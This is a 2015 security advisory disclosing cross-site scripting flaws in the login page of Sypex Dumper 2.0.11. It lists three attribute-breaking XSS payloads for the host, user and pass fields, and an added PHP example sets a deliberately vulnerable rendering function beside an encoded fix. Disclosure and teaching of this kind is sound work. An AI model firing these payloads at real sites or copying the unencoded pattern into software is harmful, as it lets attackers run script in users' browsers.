Sypex Dumper version 2.0.11 suffers from multiple cross site scripting vulnerabilities.
a557a41cc14f0fa4371e88173d14cc9d2536437e1d9f3a70dba00fcae55b4b4b
Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org
Source:
http://hyp3rlinx.altervista.org/advisories/AS-SYPEX0529.txt
Vendor:
https://sypex.net
Product:
Sypex Dumper 2.0.11 is a PHP web-based MySQL database management system.
Advisory Information:
================================================
Sypex Dumper 2.0.11 XSS Vulnerabilities
XSS
Vulnerability Details:
=====================
Login page input fields are vulnerable to XSS via the POST method,
allowing remote attackers to execute arbitrary script in the
context of a user's browser session.
Exploit code(s):
===============
host="onMouseOver="alert(666);
pass="onMouseOver="alert(666);
user="onMouseOver="alert(666);
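The payloads above work because each submitted value is placed inside a double-quoted HTML attribute: the leading quote closes value="" early and the rest becomes an onMouseOver handler. The following PHP is an added illustration for this advisory, not Sypex Dumper's own code; it assumes the login page reflects the host, user and pass fields into <input value="..."> attributes, and shows that pattern beside the context-correct fix (htmlspecialchars() with ENT_QUOTES) using the host payload from the advisory as sample input.

```php
<?php
// Added illustration for this advisory, not Sypex Dumper's own code.
// Assumed pattern: the login page writes the submitted host/user/pass
// values back into <input value="..."> attributes without encoding them.

// Vulnerable rendering: the raw value is interpolated into a double-quoted attribute.
function render_field_vulnerable(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened rendering: encode for the HTML attribute context first.
// ENT_QUOTES turns both quote characters into entities; ENT_SUBSTITUTE keeps
// invalid UTF-8 from making htmlspecialchars() return an empty string.
function render_field_safe(string $name, string $value): string
{
    $enc = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $name . '" value="' . $enc . '">';
}

// Does the value that ends up in the markup contain any character that can
// terminate the attribute or open a tag? If so, the attacker controls markup.
function value_can_break_attribute(string $rendered_value): bool
{
    return preg_match('/["\'<>]/', $rendered_value) === 1;
}

// Sample input: the host payload quoted in this advisory.
$payload = '"onMouseOver="alert(666);';

foreach (['host', 'user', 'pass'] as $field) {
    echo $field, ' vulnerable: ', render_field_vulnerable($field, $payload), PHP_EOL;
    echo $field, ' hardened:   ', render_field_safe($field, $payload), PHP_EOL;
}

// Raw payload: the leading quote ends value="" and onMouseOver= becomes a live attribute.
var_dump(value_can_break_attribute($payload));
// Encoded payload: &quot;onMouseOver=&quot;alert(666); is inert attribute text.
$encoded = htmlspecialchars($payload, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
var_dump(value_can_break_attribute($encoded));
```

Run it with the PHP CLI to compare the two renderings. The encoding has to match the output context: htmlspecialchars() with ENT_QUOTES is correct for a double- or single-quoted attribute, but a value written into a JavaScript block or a URL needs a different encoder, and a Content-Security-Policy that disallows inline event handlers limits the impact if an encoding step is missed.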
Disclosure Timeline:
=========================================================
Vendor Notification: May 27, 2015
May 29, 2015: Public Disclosure
Severity Level:
=========================================================
Medium
Description:
==========================================================
Request Method(s):
[+] POST
Vulnerable Product:
[+] Sypex Dumper 2.0.11
Vulnerable Parameter(s):
[+] host, pass, user
Affected Area(s):
[+] Login page
===============================================================
(hyp3rlinx)